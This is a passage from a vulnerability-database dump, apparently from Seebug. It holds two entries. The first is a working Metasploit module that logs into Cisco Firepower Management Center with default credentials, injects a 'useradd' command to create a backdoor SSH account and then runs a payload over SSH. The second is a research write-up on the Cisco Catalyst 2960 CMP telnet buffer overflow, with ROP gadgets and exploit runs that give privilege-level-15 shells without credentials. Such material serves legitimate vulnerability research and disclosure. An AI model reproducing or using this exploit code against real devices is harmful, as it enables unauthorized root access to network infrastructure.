'true',\r\n 'SSLVersion' => 'Auto',\r\n 'RPORT' => 443\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n # admin:Admin123 is the default credential for 6.0.1\r\n OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),\r\n OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),\r\n OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),\r\n OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),\r\n OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n # For this exploit to work, we need to check two services:\r\n # * HTTP - To create the backdoor account for SSH\r\n # * SSH - To execute our payload\r\n\r\n vprint_status('Checking Cisco Firepower Management console...')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')\r\n })\r\n\r\n if res && res.code == 200\r\n vprint_status(\"Console is found.\")\r\n vprint_status(\"Checking SSH service.\")\r\n begin\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n Net::SSH.start(rhost, 'admin',\r\n port: datastore['SSHPORT'],\r\n password: Rex::Text.rand_text_alpha(5),\r\n auth_methods: ['password'],\r\n non_interactive: true\r\n )\r\n end\r\n rescue Timeout::Error\r\n vprint_error('The SSH connection timed out.')\r\n return Exploit::CheckCode::Unknown\r\n rescue Net::SSH::AuthenticationFailed\r\n # Hey, it talked. So that means SSH is running.\r\n return Exploit::CheckCode::Appears\r\n rescue Net::SSH::Exception => e\r\n vprint_error(e.message)\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_sf_action_id(sid)\r\n requirements = {}\r\n\r\n print_status('Attempting to obtain sf_action_id from rulesimport.cgi')\r\n\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\"\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')\r\n end\r\n\r\n sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]\r\n\r\n unless sf_action_id\r\n fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')\r\n end\r\n\r\n sf_action_id\r\n end\r\n\r\n def create_ssh_backdoor(sid, user, pass)\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n sf_action_id = get_sf_action_id(sid)\r\n sh_name = 'exploit.sh'\r\n\r\n print_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\")\r\n\r\n mime_data = Rex::MIME::Message.new\r\n mime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"')\r\n mime_data.add_part('file', nil, nil, 'form-data; name=\"source\"')\r\n mime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"')\r\n mime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"')\r\n mime_data.add_part(\r\n \"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\",\r\n 'application/octet-stream',\r\n nil,\r\n \"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\"\r\n )\r\n\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\",\r\n 'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\",\r\n 'data' => mime_data.to_s,\r\n 'vars_get' => { 'no_mojo' => '1' },\r\n })\r\n end\r\n\r\n def generate_new_username\r\n datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def generate_new_password\r\n datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def report_cred(opts)\r\n service_data = {\r\n address: rhost,\r\n port: rport,\r\n service_name: 'cisco',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: fullname,\r\n username: opts[:user],\r\n private_data: opts[:password],\r\n private_type: :password\r\n }.merge(service_data)\r\n\r\n login_data = {\r\n last_attempted_at: DateTime.now,\r\n core: create_credential(credential_data),\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\r\n proof: opts[:proof]\r\n }.merge(service_data)\r\n\r\n create_credential_login(login_data)\r\n end\r\n\r\n def do_login\r\n console_user = datastore['USERNAME']\r\n console_pass = datastore['PASSWORD']\r\n uri = normalize_uri(target_uri.path, 'login.cgi')\r\n\r\n print_status(\"Attempting to login in as #{console_user}:#{console_pass}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_post' => {\r\n 'username' => console_user,\r\n 'password' => console_pass,\r\n 'target' => ''\r\n }\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')\r\n end\r\n\r\n res_cookie = res.get_cookies\r\n if res.code == 302 && res_cookie.include?('CGISESSID')\r\n cgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first\r\n print_status(\"CGI Session ID: #{cgi_sid}\")\r\n print_good(\"Authenticated as #{console_user}:#{console_pass}\")\r\n report_cred(username: console_user, password: console_pass)\r\n return cgi_sid\r\n end\r\n\r\n nil\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n @first_exec = true\r\n cmd.gsub!(/\\/tmp/, '/usr/tmp')\r\n\r\n # Weird hack for the cmd stager.\r\n # Because it keeps using > to write the payload.\r\n if @first_exec\r\n @first_exec = false\r\n else\r\n cmd.gsub!(/>>/, ' > ')\r\n end\r\n\r\n begin\r\n Timeout.timeout(3) do\r\n @ssh_socket.exec!(\"#{cmd}\\n\")\r\n vprint_status(\"Executing #{cmd}\")\r\n end\r\n rescue Timeout::Error\r\n fail_with(Failure::Unknown, 'SSH command timed out')\r\n rescue Net::SSH::ChannelOpenFailed\r\n print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')\r\n retry\r\n end\r\n end\r\n\r\n def init_ssh_session(user, pass)\r\n print_status(\"Attempting to log into SSH as #{user}:#{pass}\")\r\n\r\n factory = ssh_socket_factory\r\n opts = {\r\n auth_methods: ['password', 'keyboard-interactive'],\r\n port: datastore['SSHPORT'],\r\n use_agent: false,\r\n config: false,\r\n password: pass,\r\n proxy: factory,\r\n non_interactive: true\r\n }\r\n\r\n opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n ssh = nil\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n @ssh_socket = Net::SSH.start(rhost, user, opts)\r\n end\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, e.message)\r\n end\r\n end\r\n\r\n def exploit\r\n # To exploit the useradd vuln, we need to login first.\r\n sid = do_login\r\n return unless sid\r\n\r\n # After login, we can call the useradd utility to create a backdoor user\r\n new_user = generate_new_username\r\n new_pass = generate_new_password\r\n create_ssh_backdoor(sid, new_user, new_pass)\r\n\r\n # Log into the SSH backdoor account\r\n init_ssh_session(new_user, new_pass)\r\n\r\n begin\r\n execute_cmdstager({:linemax => 500})\r\n ensure\r\n @ssh_socket.close\r\n end\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92711", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:59:58", "description": "\u8be6\u60c5\u6765\u6e90\uff1ahttps://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/\r\n\r\nDo you still have telnet enabled on your Catalyst switches? Think twice, here\u2019s a proof-of-concept remote code execution exploit for Catalyst 2960 switch with latest suggested firmware. Check out the exploit code [here](https://github.com/artkond/cisco-rce/). What follows is a detailed write-up of the exploit development process for the vulnerability leaked from CIA\u2019s archive on March 7th 2017 and publicly disclosed by Cisco Systems on March 17th 2017\\. At the time of writing this post there is no patch available. Nonetheless there is a remidiation - disable telnet and use SSH instead.\r\n\r\n## Vault 7 CIA leak\r\n\r\nA series of CIA\u2019s documents were leaked on March 7th 2017 and [published](https://wikileaks.org/ciav7p1/) on WikiLeaks. Among other publications there was an interesting preauth code execution vulnerability that affected multiple Cisco switches. This vulnerability is code-named [ROCEM](https://wikileaks.org/ciav7p1/cms/page_20250772.html) in the leaked documents. Although very few technical details were mentioned, few things stand out.\r\n\r\nThe Vault 7\u2019s documents shed a light on the testing process for the actual exploit. No exploit source code is available in the leak. Two use cases are highlighted there - the tool can be launched in either interactive mode or set mode. The interactive mode sends the payload via telnet and immeditely presents the attacker with command shell in the context of the same telnet connection. Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_23134373.html):\r\n\r\n\r\n\r\n```\r\nStarted ROCEM interactive session - successful:\r\n\r\n[email\u00a0protected]/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254\r\n[+] Validating data/interactive.bin\r\n[+] Validating data/set.bin\r\n[+] Validating data/transfer.bin\r\n[+] Validating data/unset.bin\r\n****************************************\r\nImage: c3560-ipbase-mz.122-35.SE5\r\nHost: 192.168.0.254\r\nAction: Interactive\r\n****************************************\r\nProceed? (y/n)y\r\nTrying 127.0.0.1...\r\n[*] Attempting connection to host 192.168.0.254:23\r\nConnected to 127.0.0.1.\r\nEscape character is '^]'.\r\n[+] Connection established\r\n[*] Starting interactive session\r\nUser Access Verification\r\nPassword:\r\nMLS-Sth#\r\n\r\nMLS-Sth# show priv\r\nCurrent privilege level is 15\r\nMLS-Sth#show users\r\nLine User Host(s) Idle Location\r\n* 1 vty 0 idle 00:00:00 192.168.221.40\r\nInterface User Mode Idle Peer Address\r\nMLS-Sth#exit\r\nConnection closed by foreign host.\r\n\r\n```\r\n\r\n\r\n\r\nSet mode. Modify switch memory in order to make any\r\nsubsequent telnet connections passwordless. Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_24969226.html):\r\n\r\n\r\n\r\n```\r\nTest set/unset feature of ROCEM\r\nDUT configured with target configuration and network setup\r\nDUT is accessed by hopping through three flux nodes as per the CONOP\r\nReloaded DUT to start with a clean device\r\nFrom Adverse ICON machine, set ROCEM:\r\n[email\u00a0protected]/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254\r\n[+] Validating data/interactive.bin\r\n[+] Validating data/set.bin\r\n[+] Validating data/transfer.bin\r\n[+] Validating data/unset.bin\r\n\r\n****************************************\r\nImage: c3560-ipbase-mz.122-35.SE5\r\nHost: 192.168.0.254\r\nAction: Set\r\n****************************************\r\n\r\nProceed? (y/n)y\r\n[*] Attempting connection to host 192.168.0.254:23\r\n[+] Connection established\r\n[*] Sending Protocol Step 1\r\n[*] Sending Protocol Step 2\r\n[+] Done\r\n[email\u00a0protected]/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */:/home/user1/ops/adverse/adverse-1r/rocem#\r\n\r\nVerified I could telnet and rx priv 15 without creds:\r\n\r\n[email\u00a0protected]/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254\r\nTrying 192.168.0.254...\r\nConnected to 192.168.0.254.\r\nEscape character is '^]'.\r\n\r\nMLS-Sth#\r\n\r\nMLS-Sth#show priv\r\nCurrent privilege level is 15\r\nMLS-Sth#\r\n\r\n```\r\n\r\n\r\n\r\nOne piece of information being useful for me in researching this vulnerability was a telnet debug output. Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_17760327.html):\r\n\r\n\r\n\r\n```\r\n14\\. Confirm Xetron EAR 5355 - Debug telnet causes anomalous output \r\n 1.Enabled debug telnet on DUT\r\n 2.Set ROCEM\r\n 3.Observed the following:\r\n 000467: Jun 3 13:54:09.330: TCP2: Telnet received WILL TTY-SPEED (32) (refused)\r\n 000468: Jun 3 13:54:09.330: TCP2: Telnet sent DONT TTY-SPEED (32)\r\n 000469: Jun 3 13:54:09.330: TCP2: Telnet received WILL LOCAL-FLOW (33) (refused)\r\n 000470: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LOCAL-FLOW (33)\r\n 000471: Jun 3 13:54:09.330: TCP2: Telnet received WILL LINEMODE (34)\r\n 000472: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LINEMODE (34) (unimplemented)\r\n 000473: Jun 3 13:54:09.330: TCP2: Telnet received WILL NEW-ENVIRON (39)\r\n 000474: Jun 3 13:54:09.330: TCP2: Telnet sent DONT NEW-ENVIRON (39) (unimplemented)\r\n 000475: Jun 3 13:54:09.330: TCP2: Telnet received DO STATUS (5)\r\n 000476: Jun 3 13:54:09.330: TCP2: Telnet sent WONT STATUS (5) (unimplemented)\r\n 000477: Jun 3 13:54:09.330: TCP2: Telnet received WILL X-DISPLAY (35) (refused)\r\n 000478: Jun 3 13:54:09.330: TCP2: Telnet sent DONT X-DISPLAY (35)\r\n 000479: Jun 3 13:54:09.330: TCP2: Telnet received DO ECHO (1)\r\n 000480: Jun 3 13:54:09.330: Telnet2: recv SB NAWS 116 29\r\n 000481: Jun 3 13:54:09.623: Telnet2: recv SB 36 92 OS^K'zAuk,Fz90X\r\n 000482: Jun 3 13:54:09.623: Telnet2: recv SB 36 0 ^CCISCO_KITS^Ap\r\n\r\n```\r\n\r\n\r\nNote the `CISCO_KITS` option received by the service on the last line. This prooved to be an important string.\r\n\r\n## Cisco advisory\r\n\r\nOn March 17th 2017 Cisco Systems [disclosed](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp) a vulnerability present in their switches. This diclosure was based on the documents from Vault 7:\r\n\r\n> A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.\r\n\r\nNot much details were available at the time of writing this article, except for the following paragraph:\r\n\r\n> The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors:\r\n> \r\n> * The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and\r\n> * The incorrect processing of malformed CMP-specific Telnet options.\r\n\r\nLong story short, the vulnerability allows the attacker to exploit telnet service to gain remote code execution on the target switch. But in order to make any use of this advisory I needed more information on the matter. So I decided dig deeper into Cisco Cluster Management Protocol.\r\n\r\n## Switch clustering\r\n\r\nAll right! I had two Catalyst 2960 switches for researching this vulnerability. Clustering sets a master-slave relation between switches. Master switch is able to get a privileged command shell on the slave. As Cisco mentioned in its adivisory, telnet is used as a command protocol between cluster members. Some info on clustering can be found [here](http://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3750x_3560x/software/release/12-2_55_se/configuration/guide/3750xscg/swclus.pdf) and [here\u2019s](https://slaptijack.com/networking/cisco-catalyst-configuration-using-cluster-commands/) an example of setting up a cluster environment.\r\n\r\nNow to look for cluster traffic between them. The following should be in the master switch config:\r\n\r\n\r\n\r\n```\r\ncluster enable CLGRP 0\r\ncluster member 1 mac-address xxxx.xxxx.xxxx\r\n\r\n```\r\n\r\n\r\n\r\nThis will add a nearby switch as a cluster slave. `rcommand <num>` allows to get command interface on a slave switch from the master\u2019s interface. This is expected by design.\r\n\r\n\r\n```\r\ncatalyst1>rcommand 1\r\ncatalyst2>who\r\n Line User Host(s) Idle Location\r\n* 1 vty 0 idle 00:00:00 10.10.10.10\r\n\r\n Interface User Mode Idle Peer Address\r\n\r\n```\r\n\r\n\r\nLet\u2019s look at the traffic generated by `rcommand`:\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/llc_traffic.png)\r\n\r\nHey! Where da hell is telnet traffic? Advisory clearly states:\r\n\r\n> The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members.\r\n\r\nOk, running `show version` to see some more traffic:\r\n\r\n\r\n```\r\ncatalyst2>show version\r\nCisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE1, RELEASE SOFTWARE (fc1)\r\n\r\n```\r\n\r\n\r\nAha! Telnet traffic is actualy being incapsulated into layer 2 LLC packet. If we look close enough we will notice IP packets inside with chopped MAC addresses at source and destination fields. Inside those \u201cIP\u201d packets reside valid TCP frames with a telnet session.\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/show_ver_cluster.png)\r\n\r\nA telnet session is usually preceded by negotiating telnet options. Among them are: terminal size, terminal type etc. Take a look at the [RFC](https://tools.ietf.org/html/rfc854) for more info.\r\n\r\nRight before being presented with the welcome `catalyst2>` message an interesting telnet option is transfered to the server side:\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/cisco_kits_traffic.png)\r\n\r\nHere you can see a telnet option \u201cCISCO_KITS\u201d sent from the master switch to the slave. The very same string present in the Vault 7 documents during the execution of exploit. Time to take a closer look at the switch internals.\r\n\r\n## Peeking at firmware\r\n\r\nFirmware is located at `flash:<version>.bin` on the switch.\r\n\r\n\r\n```\r\ncatalyst2#dir flash:\r\nDirectory of flash:/\r\n\r\n 2 -rwx 9771282 Mar 1 1993 00:13:28 +00:00 c2960-lanbasek9-mz.122-55.SE1.bin\r\n 3 -rwx 2487 Mar 1 1993 00:01:53 +00:00 config.text\r\n\r\n```\r\n\r\n\r\nBuilt-in ftp client allows to transfer this firmware to an arbitrary ftp server. Ok, now to analyze and extract contents of the file with [binwalk](https://github.com/devttys0/binwalk):\r\n\r\n\r\n```\r\n$ binwalk -e c2960-lanbasek9-mz.122-55.SE1.bin \r\n\r\nDECIMAL HEXADECIMAL DESCRIPTION\r\n--------------------------------------------------------------------------------\r\n112 0x70 bzip2 compressed data, block size = 900k\r\n\r\n```\r\n\r\n\r\nIn order to facilitate static analisys of the resulting binary we better know the firmware load offset. This offset is printed to serial console during boot process:\r\n\r\n\r\n```\r\nLoading \"flash:c2960-lanbasek9-mz.122-55.SE1.bin\"...@@@@@@@@@@@@@@@@@@@@@@\r\nFile \"flash:c2960-lanbasek9-mz.122-55.SE1.bin\" uncompressed and installed,\r\nentry point: 0x3000\r\nexecuting...\r\n\r\n```\r\n\r\n\r\nFire up IDA and let\u2019s roll. CPU architecture is PowerPC 32-bit BigEndian. Load the binary at 0x3000:\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/ida_offset.png)\r\n\r\n### Discovering strings\r\n\r\nRemember the `CISCO_KITS` string in the cluser traffic I captured before? This was my starting point. After discovering most of the functions in IDA, I was able to see the cross-refrences to the strings located at the end of firmware.\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/ida_cisco_kits.png)\r\n\r\n\u201cCISCO_KITS\u201d string is referenced by `return_cisco_kits` function, which just returns this string as `char *`. We will focus out attention on on the `call_cisco_kits` function at `0x0004ED8C` which calls `return_cisco_kits`.\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/ida_proximity1.png)\r\n\r\nBecause telnet code is rather symmetrical for client and server here we actually can see the format of the buffer that is being sent to the server side - `%c%s%c%d:%s:%d:`. This actually goes in line with the observed traffic where the sent buffer was `\\x03CISCO_KITS\\x012::1:`\r\n\r\n\r\n\r\n```\r\nif ( telnet_struct->is_client_mode ) // client mode? then send \"CISCO_KITS\" string\r\n{\r\n if ( telnet_struct->is_client_mode == 1 )\r\n {\r\n cisco_kits_string_2 = (char *)return_cisco_kits();\r\n int_two = return_2();\r\n tty_str = get_from_tty_struct((telnet_struct *)telnet_struct_arg->tty_struct);\r\n *(_DWORD *)&telnet_struct_arg->tty_struct[1].field_6D1;\r\n format1_ret = format_1(\r\n 128,\r\n (int)&str_buf[8],\r\n \"%c%s%c%d:%s:%d:\",\r\n 3,\r\n cisco_kits_string_2,\r\n 1,\r\n int_two,\r\n tty_str,\r\n 0);\r\n telnet_struct = (telnet_struct *)telnet_send_sb(\r\n (int)telnet_struct_arg,\r\n 36,\r\n 0,\r\n &str_buf[8],\r\n format1_ret,\r\n v8,\r\n v7,\r\n v6);\r\n }\r\n}\r\n\r\n```\r\n\r\n\r\nNotice something? There are two `%s` string modifiers but only one string is actually present in the traffic sample which is `CISCO_KITS`, the second one is empty and is confined between two `:` chars. Further observing the control flow of the very same function I noticed some funny behaviour when dealing with the second string (this time the server-side portion of the code):\r\n\r\n```\r\nfor ( j = (unsigned __int8)*string_buffer; j != ':'; j = (unsigned __int8)*string_buffer )// put data before second \":\" at &str_buf + 152\r\n{\r\n str_buf[v19++ + 152] = j;\r\n ++string_buffer;\r\n}\r\n\r\n```\r\n\r\n\r\nThe data we sent over in the second %s string is actually copied until `:` char without checking the destination boundaries while the target buffer resides on the stack. What does this look like? Correct! ~~Buffalo~~ buffer overflow!\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/buffalo_overflow.png)\r\n\r\n## Getting code execution\r\n\r\nGetting control of the instruction pointer was easy as it was overwritten with the buffer I sent (btw I used [IODIDE](https://github.com/nccgroup/IODIDE) for debugging). The problem was that heap and stack (which resides on the heap) were not executable. My best bet is that this is actually the effect of data and instruction caches enabled. Here\u2019s a slide from Felix Lindner\u2019s [presentation](https://www.blackhat.com/presentations/bh-usa-09/LINDNER/BHUSA09-Lindner-RouterExploit-SLIDES.pdf) at BlackHat 2009:\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/caches.png)\r\n\r\n### ROPing a way out\r\n\r\nSince there wasn\u2019t a way to execute code on the stack I had to use it as a data buffer and reuse existing code in the firmware. The idea is to chain function epilogs in a meaningful way to perform arbitary memory writes. But wait, write what? Take a look at the decompiled function at `0x00F47A34`:\r\n\r\n\r\n```\r\nif ( ptr_is_cluster_mode(tty_struct_var->telnet_struct_field) )\r\n{\r\n telnet_struct_var = tty_struct_var->telnet_struct_field;\r\n ptr_get_privilege_level = (int (__fastcall *)(int))some_libc_func(0, (unsigned int *)&dword_22659D4[101483]);\r\n privilege_level = ptr_get_privilege_level(telnet_struct_var);// equals to 1 during rcommand 1\r\n telnet_struct_1 = tty_struct_var->telnet_struct_field;\r\n ptr_telnet_related2 = (void (__fastcall *)(int))some_libc_func(1u, (unsigned int *)&dword_22659D4[101487]);\r\n ptr_telnet_related2(telnet_struct_1);\r\n *(_DWORD *)&tty_struct_var->privilege_level_field = ((privilege_level << 28) & 0xF0000000 | *(_DWORD *)&tty_struct_var->privilege_level_field & 0xFFFFFFF) & 0xFF7FFFFF;\r\n}\r\nelse\r\n{\r\n //generic telnet session\r\n}\r\n\r\n```\r\n\r\n\r\nInteresting things happen here. First thing to emphasize is that both calls of `ptr_is_cluster_mode` and `ptr_get_privilege_level` are made indirectly by referencing global variables. Check line at address `0x00F47B60` - `is_cluster_mode` function address is being loaded from dword at `0x01F24A7`. In a similar way the address of `get_privilege_level` is being loaded from `r3` register at `0x00F47B8C`. At this point `r3` contents is a dereferenced pointer residing at address `0x022659D4 + 0x28 + 0xC`.\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/ida_dis.png)\r\n\r\nIf the `ptr_is_cluster_mode` call returns non zero and `ptr_get_privilege` call returns a value that differs from -1 we will be presented with a telnet shell without the need to provide any credentials. Variable `privilege_level` is being checked for its value further down the code:\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/privilege_level_br.png)\r\n\r\nWhat if I could overwrite these function pointers to something that always return the desired positive value? Since stack and heap weren\u2019t directly executable I had to reuse the existing code to performs such memory writes. The following [ROP](https://en.wikipedia.org/wiki/Return-oriented_programming) gadgets were used:\r\n\r\n\r\n```\r\n0x000037b4: \r\n lwz r0, 0x14(r1)\r\n mtlr r0\r\n lwz r30, 8(r1)\r\n lwz r31, 0xc(r1)\r\n addi r1, r1, 0x10 \r\n blr\r\n\r\n```\r\n\r\n\r\nLoad `is_cluster_mode` function pointer into `r30`, load the value to overwrite this pointer into `r31`. The value to overwrite is an address of a function that always returns 1:\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/return_1_function.png)\r\n\r\n\r\n```\r\n0x00dffbe8: \r\n stw r31, 0x34(r30)\r\n lwz r0, 0x14(r1)\r\n mtlr r0\r\n lmw r30, 8(r1)\r\n addi r1, r1, 0x10\r\n blr\r\n\r\n```\r\n\r\n\r\nPerform the actual write.\r\n\r\n\r\n```\r\n0x0006788c: \r\n lwz r9, 8(r1)\r\n lwz r3, 0x2c(r9)\r\n lwz r0, 0x14(r1)\r\n mtlr r0\r\n addi r1, r1, 0x10\r\n blr\r\n\r\n```\r\n\r\n```\r\n0x006ba128: \r\n lwz r31, 8(r1)\r\n lwz r30, 0xc(r1)\r\n addi r1, r1, 0x10\r\n lwz r0, 4(r1)\r\n mtlr r0\r\n blr\r\n\r\n```\r\n\r\n\r\nPrevious two gadgets load a pointer of `get_privilege_level` function into `r3`, and the value to overwrite it with into `r31`. The target value is a function that returns 15 (could\u2019ve used this function for both writes tho):\r\n\r\n![](https://images.seebug.org/content/images/2017/04/pic/return_15_function.png)\r\n\r\n```\r\n0x0148e560: \r\n stw r31, 0(r3)\r\n lwz r0, 0x14(r1)\r\n mtlr r0\r\n lwz r31, 0xc(r1)\r\n addi r1, r1, 0x10\r\n blr\r\n\r\n```\r\n\r\n\r\nThis epilog makes the final write and returns to the legitimate execution flow. Of course, stack frame should be formed accordingly to make this rop chain work. Check out the exploit [source](https://github.com/artkond/cisco-rce/blob/master/c2960-lanbasek9-m-12.2.55.se1.py) to see the actual stack layout for this chain to work as intended.\r\n\r\n### Running the exploit\r\n\r\nAt the end of the day I ended up with a tool with the ability to patch function pointers responsible for credless connection and privilege level. Note that the exploit code is heavily dependent on the exact firmware version used on the switch. Using exploit code for some different firmware most probably will crash the device.\r\n\r\nI used the knowledge from static and dynamic analisys of an older firmware SE1 to build an exploit for the latest suggested firmware 12.2(55)SE11\\. All the difference between firmware versions is different functions and pointers offsets. Also, the way the exploit works makes it easy to revert the changes back. Example:\r\n\r\n\r\n```\r\n$ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --set\r\n[+] Connection OK\r\n[+] Recieved bytes from telnet service: '\\xff\\xfb\\x01\\xff\\xfb\\x03\\xff\\xfd\\x18\\xff\\xfd\\x1f'\r\n[+] Sending cluster option\r\n[+] Setting credless privilege 15 authentication\r\n[+] All done\r\n$ telnet 192.168.88.10\r\nTrying 192.168.88.10...\r\nConnected to 192.168.88.10.\r\nEscape character is '^]'.\r\n\r\ncatalyst1#show priv\r\nCurrent privilege level is 15\r\ncatalyst1#show ver\r\nCisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3)\r\n...\r\n\r\nSystem image file is \"flash:c2960-lanbasek9-mz.122-55.SE11.bin\"\r\n\r\n...\r\n\r\ncisco WS-C2960-48TT-L (PowerPC405) processor (revision B0) with 65536K bytes of memory.\r\n...\r\nModel number : WS-C2960-48TT-L\r\n...\r\n\r\nSwitch Ports Model SW Version SW Image \r\n------ ----- ----- ---------- ---------- \r\n* 1 50 WS-C2960-48TT-L 12.2(55)SE11 C2960-LANBASEK9-M \r\n\r\nConfiguration register is 0xF\r\n\r\n```\r\n\r\n\r\nTo unset this behaviour:\r\n\r\n\r\n```\r\n$ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --unset\r\n[+] 